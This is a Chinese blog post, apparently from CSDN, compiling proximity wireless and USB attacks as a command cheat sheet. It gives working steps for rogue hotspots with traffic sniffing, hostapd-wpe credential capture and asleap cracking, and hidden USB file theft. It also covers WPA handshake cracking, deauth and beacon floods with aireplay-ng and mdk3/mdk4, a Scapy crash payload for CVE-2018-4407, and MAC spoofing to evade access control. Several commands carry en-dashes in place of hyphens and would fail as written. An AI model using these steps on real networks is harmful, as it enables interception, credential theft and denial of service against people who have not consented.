首页 > 其他分享 >WEB渗透-近源攻击合集

WEB渗透-近源攻击合集

时间:2024-08-12 14:25:01浏览次数:9  
标签:WEB 近源 hostapd ng xx wlan1 wpe wlan1mon 合集

钓鱼网络

Hostapd

>apt install hostapd dnsmasq
>cd /etc/hostapd

创建无加密热点

>vim open.conf 

修改以下内容

Interface=wlan1
Ssid=FreeWIFI
Driver=nl80211
Channel=1
Hw_mode=g

修改dns配置

>vim /etc/dnsmasq.conf
Dhcp-range=10.0.0.1, 10.0.0.255,12h
Interface=wlan1

重启应用配置

>systemctl restart dnsmasq
消除网卡限制
>nmcli radio wifi off
>rfkill unblock wlan
>ifconfig wlan1 10.0.0.1/24
>hostapd open.conf

嗅探

>sysctl –w net.ipv4.ip_forward=1
>iptables –t nat –A POSTROUTING –o 网卡 –j MASQUERADE
>bettercap –iface wlan1
>net.show
>net.sniff on
>driftnet –i wlan1

Hostapd-wpe

>apt install hostapd-wpe
>vim /etc/hostapd-wpe/hostapd-wpe.conf

配置

interface=wlan1
Ssid=
Channel=

证书修改

>cd /etc/hostapd-wpe/certs/

文件ca.cnf server.cnf client.cnf

修改countrName stateOrProvinceName localityName …….

>rm –rf *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*
>make clean
>./bootstrap
>make install

执行创建热点

>hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

获取到密码时使用asleep破解

>asleap –C Challenge值 –R response值 –W 字典文件

BadUSB

USBCopyer

USBCopyer 是一个开源工具,专为自动化备份或复制插入的U盘中的文件而设计。它可以按需执行复制操作,支持多种定制策略,如扩展名过滤、磁盘黑白名单以及隐藏模式。

https://github.com/kenvix/USBCopyer

双击下载的 USBCopyer.exe 文件来启动程序。 设置参数:右键点击系统托盘区域的图标,选择“设置”以调整复制规则。 启动隐藏模式:若要让USBCopyer在后台运行,启动时添加 /hide 参数

USBCopyer.exe /hide

开机启动:为了使USBCopyer在每次开机时自动运行,你可以将上述命令行添加到启动项。

WI-FI破解

wifite

Kali下工具wifite,加载网卡,开启监听模式,#airmon-ng check kill

>airmon-ng start wlan1

安装hcxtools v4.2.0或更高版本,hcxdumptool v4.2.0或更高版本

>apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
>git clone https://github.com/ZerBea/hcxtools
>cd hcxtools
>make
>make install 
>git clone https://github.com/ZerBea/hcxdumptool
>cd hcxdumptool
>make
>make install
>wifite –-dict /root/Desktop/wordlist.txt  加载

Aircrack-ng

>airmon-ng start wlan0 开启监听模式
>airodump-ng wlan0mon  查看数据包
>airodump-ng –c 1 –bssid APmac –w name wlan1mon保存某AP数据包
>aireplay-ng –deauth 10 –a APmac wlan0mon  deauth攻击
>aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon deauth #攻击某个设备直至获取handshake(握手包)
>airmon-ng stop wlan0mon #关闭监听模式
>aircrack-ng –w wordlist.txt name.cap #指定字典破解密码

无线干扰

Beacon flood

需切换网卡为监听模式

>airmon-ng start wlan1

创建大量虚假热点Mdk3 mon0 b

>mdk3 wlan1mon b -f /root/wifi.txt -a -s 1500

Deauth flood

针对AP

>airmon-ng start wlan1
>aireplay-ng –deauth 10 –a AP's mac address mon0

针对AP内设备

>airmon-ng start wlan1       #将网卡置为监听模式
>airodump-ng wlan1mon –bssid #目标ap的ssid
>aireplay-ng -0 0 -a ap的ssid -c AP的ssid wlan0mon #开始攻击#

Mdk3 destruction

针对范围内

>mdk3 wlan1mon d

针对AP

>airodump-ng wlan1mon
>mdk3 wlan1mon a -a APmac 发起攻击

黑名单

>mdk3 wlan1mon d –c 信道 –b /blacklist.txt.
>mdk3 wlan1mon  b -n test -w -g -c 1 -s 200

WiFi芯片esp8266

Mdk4

>mdk4 wlan0mon d

CVE-2018-4407

Scapy
send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))

Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备) Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复) Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复) Apple OS X El Capitan及更早版本:所有设备

绕过mac地址认证

Ifconfig

>ifconfig wlan1 down
>ifconfig wlan1 hw ether xx:xx:xx:xx:xx:xx
>ifconfig wlan1 up

Macchanger

>macchanger –m xx:xx:xx:xx:xx:xx wlan1
>macchanger –r wlan1

标签:WEB,近源,hostapd,ng,xx,wlan1,wpe,wlan1mon,合集
From: https://blog.csdn.net/qq_59468567/article/details/141130468

相关文章

  • 基于flask+vue框架的基于Web民宿管理系统的设计与实现[开题+论文+程序]-计算机毕设
    本系统(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。系统程序文件列表开题报告内容研究背景随着旅游业的蓬勃发展,民宿作为一种新兴的住宿方式,凭借其独特的文化体验、个性化的服务以及灵活的价格策略,逐渐受到广大旅行者的青睐。然而......
  • vue实现录音并转文字功能,包括PC端web,手机端web
    vue实现录音并转文字功能,包括PC端,手机端和企业微信自建应用端不止vue,不限技术栈,vue2、vue3、react、.net以及原生js均可实现。原理浏览器实现录音并转文字最快捷的方法是通过WebSpeechAPI来实现,这是浏览器内置示例的api方法,可以直接调用,无需引入任何依赖包,唯一需要注意的是浏览......
  • web解题思路(自用)
    工具firefox的hackbar插件,bp,kali-linux,蚁剑,7kbscan等抓包修改BP,hackbar通过hackbar传入get,post参数,例如?name1=value1&name2=value2,url后添加文件路径,可以访问相应的文件,404notfound;403越权访问;200okhttpX-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式......
  • 341本阿里巴巴系列精品编程技术电子书合集
    获取方式341本阿里巴巴系列精品编程技术电子书合集。分享推荐电子资料《阿里巴巴Java开发手册》(终极版)《阿里云实时计算Flink版解决方案白皮书-2021版》《Python脚本速查手册》《Shell脚本速查手册》《Flutter企业级应用开发实战手册》《云原生开发者洞察白皮书》......
  • 简单的python web项目的docker-compose.yml 示例
    一个简单的pythonweb项目,包含redis,mysql,nginx,定时业务调度等其中web启动注册了自定义命令flaskcreate-db&&flaskinit-db&&uwsgi/web/uwsgi.iniversion:'3.5'services:db:image:mysqlcontainer_name:yeping_mysqlcommand:--default-......
  • 【MSF系列】命令合集
    ###生成payloadmsfvenom-pwindows/meterpreter/reverse_winhttpsLHOST=39.97.167.211LPORT=6667--platformwindows-ax86HandLerSSLCert=./my.pemStagerVerifySSLCert=true-s42--smallest-ex86/shikata_ga_nai-i9-fraw|msfvenom--platformwindows-ax86......
  • 【Web API 】渗透测试指南
    一、概述1.1API的基本概念1.2API的作用1.3API的类型二、WebAPI渗透测试2.1测试工具2.2信息收集2.2.1目录扫描2.2.2网络流量分析2.2.3使用互联网资源2.3漏洞检测2.4实战案例2.4.1接口枚举2.4.......
  • 在IIS上部署ASP.NET Core Web API
    在IIS上部署ASP.NETCoreWebAPI和BlazorWasm详细教程  前言前段时间我们完成了七天.NET8操作SQLite入门到实战的开发系列教程,有不少同学留言问如何将项目发布部署到IIS上面运行。本篇文章我们就一起来讲讲在IIS上部署ASP.NETCoreWebAPI和BlazorWasm。前提条件......
  • RabbitMQ Web管理界面简介
    OverviewTotalsQueuedmessagesReadyNumberofmessagesthatareavaliabletobedeliverednow.待消费的消息数量一般来说,如果队列中ready状态的消息数量比较多,则说明消费者的处理能力可能不足,可以考虑适当增加消费者UnackedNumberofmessagesforwhichthe......
  • OpenWebUI + Ollma 构建本地AI知识库
    本机环境:rocky_linux9.4,10G8核,100G磁盘部署的实验 安装Docker#step1:安装必要的一些系统工具sudoyuminstall-yyum-utilsdevice-mapper-persistent-datalvm2#Step2:添加软件源信息sudoyum-config-manager--add-repohttps://mirrors.aliyun.com/docker-ce/......